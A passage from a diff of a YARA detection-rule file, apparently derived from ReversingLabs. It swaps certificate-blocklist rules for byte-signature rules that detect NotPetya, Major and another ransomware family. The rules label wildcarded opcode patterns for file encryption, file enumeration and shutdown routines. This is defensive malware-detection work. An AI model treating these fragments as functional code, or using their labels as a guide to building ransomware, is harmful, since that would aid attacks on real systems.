+            56 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 53
+            E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45
+            ?? ?? 50 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 59 50 8D 4D ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ??
+            56 E8 ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56
+            E8 ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 33 F6 C6 45 ?? ?? 56 50 8D 4D ?? E8 ?? ??
+            ?? ?? 56 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 95 ?? ?? ?? ?? 8B CC 89 65 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 53 E8 ??
+            ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ??
+            56 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+        }
+		$ol_ecies_key_3 = {
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? EB 30 83 EC ?? 8D 55 ?? 8B CC 89 65 ?? E8
+            ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC BB ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 51 8D 4F ??
+            E8 ?? ?? ?? ?? 8D 77 ?? C7 07 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 53 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 46 ?? C6 45 ?? ?? 85 C0 74 05 8D 4E ?? EB 02 33 C9 8D 55 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 8B 06 8B CE FF 50 ?? 6A ?? 68 ?? ?? ?? ?? 8B 08 8B 49 ?? 03 C8 8B 01 FF 50 ?? 53 E8 ?? ?? ?? ?? 59 6A ??
+            6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B C7 5F 5E 64 89 0D ?? ?? ?? ?? 5B
+            8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Guangzhou typical corner Network Technology Co., Ltd." and pe.signatures [ i ] . serial == "67:67:de:f9:72:d6:ea:70:2d:8c:8a:53:af:18:32:d3" and 1361750400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $ol_do_filetypes_1 and $ol_do_filetypes_2 and $ol_do_filetypes_3 ) and ( $ol_ecies_key_1 and $ol_ecies_key_2 and $ol_ecies_key_3 ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_06477E3425F1448995Ced539789E6842 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Notpetya : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects NotPetya ransomware."
 		author = "ReversingLabs"
-		id = "21da6056-bf4e-5fc4-bef5-37010ebe8f05"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "ea655048-4ef7-5dd7-872e-f1c2e38234cf"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L531-L547"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.NotPetya.yara#L1-L73"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c0bc7808bb6bcc8273a887203c1b47d1a49fcb7719863e6bc97b5c7404a254f7"
+		logic_hash = "328f0e527fee2145879ee13c003d375db832f7f3eacf7a1eb303393c1c8b5a36"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "NotPetya"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_file = {
+            8B EC 83 EC ?? 53 56 57 33 F6 56 56 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 89
+            75 ?? 39 75 ?? 7C ?? B8 ?? ?? ?? ?? 7F ?? 39 45 ?? 76 ?? 89 45 ?? 8B D8 56 53 56 6A
+            ?? 56 57 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 74 ?? FF 75 ?? 56 56 6A ?? 50 FF 15 ?? ??
+            ?? ?? 8B F8 3B FE 74 ?? 53 8D 45 ?? 50 8B 45 ?? 57 56 FF 75 ?? 56 FF 70 ?? FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF
+            15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B C9 C2 ?? ?? 8B 45 ?? 89 45 ?? C1
+            E8 ?? 8D 58 ?? C7 45 ?? ?? ?? ?? ?? C1 E3 ?? E9
+        }
+		$main = {
+            55 8B EC 8B 45 ?? 53 56 8B 35 ?? ?? ?? ?? 57 BF ?? ?? ?? ?? 57 6A ?? BB ?? ?? ?? ??
+            53 83 C0 ?? 6A ?? 50 FF D6 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 57 6A
+            ?? 6A ?? EB ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? 6A ?? 53 8B 45 ?? 6A ?? 83 C0 ?? 50 FF D6
+            85 C0 74 ?? 8B 75 ?? 8B C6 E8 ?? ?? ?? ?? 85 C0 74 ?? 56 6A ?? 56 E8 ?? ?? ?? ?? 56
+            E8 ?? ?? ?? ?? FF 76 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 76 ?? FF 15 ?? ?? ?? ?? EB ?? 8B
+            75 ?? 56 FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 5D C2
+        }
+		$encryption_loop = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 83 7D ?? ?? 53 56 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 75 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44
+            24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ??
+            ?? ?? 8B 1D ?? ?? ?? ?? 8B 75 ?? 8B 46 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24 ?? 66 8B 10
+            66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85
+            D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24
+            ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83
+            C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ??
+            50 FF 75 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44
+            24 ?? ?? 74 ?? F7 44 24 ?? ?? ?? ?? ?? 75 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            FF D3 85 C0 75 ?? 8B 45 ?? 56 48 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? 8D
+            44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 66 8B 31 83 C1 ?? 66 85 F6 75 ??
+            2B CA D1 F9 8D 4C 4C ?? 3B C1 74 ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 74 ?? FF 75
+            ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5E 5B 8B E5 5D C2
+        }
+		$shutdown = {
+            68 ?? ?? ?? ?? 8B CA 8B D0 0F B7 45 ?? 03 C2 33 D2 F7 F6 0F B7 75 ?? 8D 85 ?? ?? ??
+            ?? 50 03 F1 8B FA FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? F6 05 ?? ?? ??
+            ?? ?? B8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? 56 57 8D 8D ?? ?? ?? ?? 51 50 8D 85 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 85 ?? ?? ?? ?? 50 56 57
+            8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 85 ?? ??
+            ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 5F 5E 8B C3 5B C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Karim Lammali" and pe.signatures [ i ] . serial == "06:47:7e:34:25:f1:44:89:95:ce:d5:39:78:9e:68:42" and 1334275199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $encrypt_file and $main and $encryption_loop and $shutdown
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0450A7C1C36951Da09C8Ad0E7F716Ff2 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Major : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Major ransomware."
 		author = "ReversingLabs"
-		id = "b4a56bbe-f2ba-52df-832d-35b92ab73683"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "0c85aff8-1fb5-5e47-ae49-72445a000eaa"
+		date = "2021-01-26"
+		modified = "2021-01-26"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L549-L565"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Major.yara#L1-L261"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cb594607ceef1b8d79145ad3905fb2c38d2ed3f3e6c8a0a793fc2dc9d0a21855"
+		logic_hash = "16fb7763e3806fca6937fef7e8b3d8bccd61cb39549061d359d630c7d266c270"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Major"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PS Partnership" and pe.signatures [ i ] . serial == "04:50:a7:c1:c3:69:51:da:09:c8:ad:0e:7f:71:6f:f2" and 1362182399 <= pe.signatures [ i ] . not_after )
-}
+	strings:
+		$find_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 33 C0 89 4D ?? 57 50 66 89 45 ?? 8D 8D ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48
+            ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84
+            0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 33 C9 8B F8 51 89 4D ?? 51 8D 4D ?? 89 7D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ??
+            8D 45 ?? 50 FF 77 ?? 57 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 47 ?? 89 4D ?? BB ?? ?? ??
+            ?? 8B 48 ?? 89 01 8B 07 8D 4D ?? 83 C0 ?? 3B C8 74 ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 8D 45 ?? 3B C6
+        }
+		$find_files_p2 = {
+            0F 84 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ??
+            ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ??
+            ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 7E ??
+            ?? 73 ?? 8B 46 ?? 83 C0 ?? 74 ?? 03 C0 50 8D 45 ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB
+            ?? 8B 06 89 45 ?? C7 06 ?? ?? ?? ?? 8B 46 ?? 89 45 ?? 8B 46 ?? 89 45 ?? C7 46 ?? ??
+            ?? ?? ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 36 33 C0 66 89 06 8B 45 ?? 83 F8
+            ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6
+            C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ??
+            ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 3F 8D 77 ?? 8B
+            4F ?? 8B 07 89 01 8B 0F 8B 47 ?? 89 41 ?? 8B 45 ?? 48 89 45 ?? 89 45 ?? 8B 46 ?? 83
+            F8 ?? 72 ?? 8B 0E 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6
+        }
+		$find_files_p3 = {
+            C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ??
+            ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ??
+            ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 36 33 C0 57 66 89 06 E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B
+            F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 66 66 66 0F 1F 84 00 ?? ?? ?? ?? 33 C0 C7 45
+            ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 0F 84 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 8B 08 85 C9 74 ?? 8B 85 ?? ?? ?? ?? 8B 00 8D 14 41 EB ?? 8B 85
+            ?? ?? ?? ?? 8B 08 8B 85 ?? ?? ?? ?? 8B 00 8D 14 48 8B 85 ?? ?? ?? ?? 8B 08 2B D1 D1
+            FA 81 FA ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8D 04 12 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85
+            ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9
+            ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 50 89 85 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72
+            ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1
+        }
+		$find_files_p4 = {
+            0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ??
+            83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68
+            ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 8B D4 33 C0 C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 66 89 02 66 39 85 ?? ?? ??
+            ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 71 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B
+            CE D1 F9 51 8D 85 ?? ?? ?? ?? 8B CA 50 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ??
+            ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 CB ?? C7 45 ??
+            ?? ?? ?? ?? 66 89 45 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D
+            51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 8D 85 ?? ?? ?? ?? 50 8D 4D ??
+            E8 ?? ?? ?? ?? 8D 45 ?? 83 CB ?? 50 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+        }
+		$find_files_p5 = {
+            83 CB ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 CB ?? 50 8D 85 ??
+            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 CB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 83 CB ?? 50 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 85 C0 74 ??
+            C6 45 ?? ?? F6 C3 ?? 74 ?? 8B 45 ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ??
+            E8 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? F6 C3 ??
+            74 ?? 8B 85 ?? ?? ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 66 89 85 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8B 85 ?? ?? ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40
+            8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8B 85 ?? ??
+            ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ??
+            ?? ?? 8B 45 ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33 C0
+        }
+		$find_files_p6 = {
+            C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 E3 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 72
+            ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? 50 8D 4D ?? FF 76 ?? 56 E8 ?? ??
+            ?? ?? 8B 55 ?? B9 ?? ?? ?? ?? 2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 46 ?? 42 8B 48 ??
+            89 55 ?? 89 01 E9 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ??
+            8D 45 ?? 50 8D 4D ?? FF 76 ?? 56 E8 ?? ?? ?? ?? 8B 55 ?? B9 ?? ?? ?? ?? 2B CA 83 F9
+            ?? 0F 82 ?? ?? ?? ?? 89 46 ?? 42 8B 48 ?? 89 55 ?? 89 55 ?? 89 01 8B 45 ?? 83 F8 ??
+            72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 54 E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? 8B 75
+            ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 7D ??
+            8B CF E8 ?? ?? ?? ?? 8B 4D ?? 85 C9 74 ?? 8B 7D ?? E9 ?? ?? ?? ?? 8B 4D ?? 85 C9 0F
+            84 ?? ?? ?? ?? 0F 1F 00 8B 45 ?? 8D 4D ?? 8B 00 83 C0 ?? 3B C8 74 ?? 6A ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4
+        }
+		$find_files_p7 = {
+            8D 45 ?? 3B C6 74 ?? 8B 4D ?? 83 F9 ?? 72 ?? 41 51 FF 75 ?? 8B C8 E8 ?? ?? ?? ?? 33
+            C0 C7 45 ?? ?? ?? ?? ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ??
+            8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B 75
+            ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 0F 1F 00 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ??
